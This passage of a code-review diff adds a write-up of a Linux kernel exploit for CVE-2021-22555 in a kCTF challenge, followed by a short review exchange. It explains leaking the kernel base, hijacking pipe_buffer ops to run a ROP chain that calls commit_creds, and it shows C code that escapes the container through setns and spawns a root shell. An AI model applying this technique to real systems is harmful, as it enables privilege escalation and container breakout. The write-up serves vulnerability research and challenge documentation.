pocs/linux/CVE-2021-22555/writeup.md

```diff
@@ -0,0 +1,440 @@
+
+```c
+// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
+static const struct pipe_buf_operations anon_pipe_buf_ops = {
+	.release	= anon_pipe_buf_release,
+	.try_steal	= anon_pipe_buf_try_steal,
+	.get		= generic_pipe_buf_get,
+};
+```
+
+Since the difference between the .data segment and the .text segment is always the same, having `anon_pipe_buf_ops` basically allows us to calculate the kernel base address.
+
+We spray a lot of `struct pipe_buffer` objects and reclaim the location of the stale `struct sk_buff` data buffer:
+
+![](images/10.png)
+
+As we still have a reference from the `struct sk_buff`, we can read its data buffer, leak the content of `struct pipe_buffer` and reveal the address of `anon_pipe_buf_ops`:
+
+```sh
+[+] anon_pipe_buf_ops: ffffffffa1e78380
+[+] kbase_addr: ffffffffa0e00000
+```
+
+With this information, we can now find JOP/ROP gadgets. Note that when reading from the unix socket, we actually free its buffer as well:
+
+![](images/11.png)
+
+### Escalating privileges
+
+We reclaim the stale `struct pipe_buffer` with a fake one with `ops` pointing to a fake `struct pipe_buf_operations`. This fake structure is planted at the same location since we know its address, and obviously, this structure should contain a malicious function pointer as `release`.
+
+![](images/12.png)
+
+The final stage of the exploit is to close all pipes in order to trigger the release which in turn will kick off the JOP chain. Finding JOP gadgets is hard, thus the goal is to achieve a kernel stack pivot as soon as possible in order to execute a kernel ROP chain.
+
+#### Kernel ROP chain
+
+We save the value of RBP at some scratchpad address in kernel so that we can later resume the execution, then we call `commit_creds(prepare_kernel_cred(NULL))` to install kernel credentials and finally we call `switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)` to switch the namespace of process 1 to the one of the *init* process. After that, we restore the value of RBP and return to resume the execution (which will immediately make `free_pipe_info()` return).
+
+#### Escaping the container and popping a root shell
+
+Arriving back in userland, we now have root permissions to can change mnt, pid and net namespaces to escape the container and break out of the kubernetes pod. Ultimately, we pop a root shell.
+
+```c
+  setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
+  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
+  setns(open("/proc/1/ns/net", O_RDONLY), 0);
+
+  char *args[] = {"/bin/bash", "-i", NULL};
+  execve(args[0], args, NULL);
+```
+
+For the kCTF challenge, one can capture the flag as follows:
+
+```sh
+root@NSJAIL / # cat /proc/mounts | grep flag
+...
+tmpfs /var/lib/kubelet/pods/.../volumes/kubernetes.io~secret/flag tmpfs rw,relatime 0 0
+...
+root@NSJAIL / # cat /var/lib/kubelet/pods/.../volumes/kubernetes.io~secret/flag/flag
+KCTF{$CHAL_NAME-$TIMESTAMP:$MAC}
+```
+
+## Proof-Of-Concept
```

Comment:
it would be cool to have an asciicinema with this as a first image - so that when people share it on twitter, it shows up as a preview.

Reply:
Done.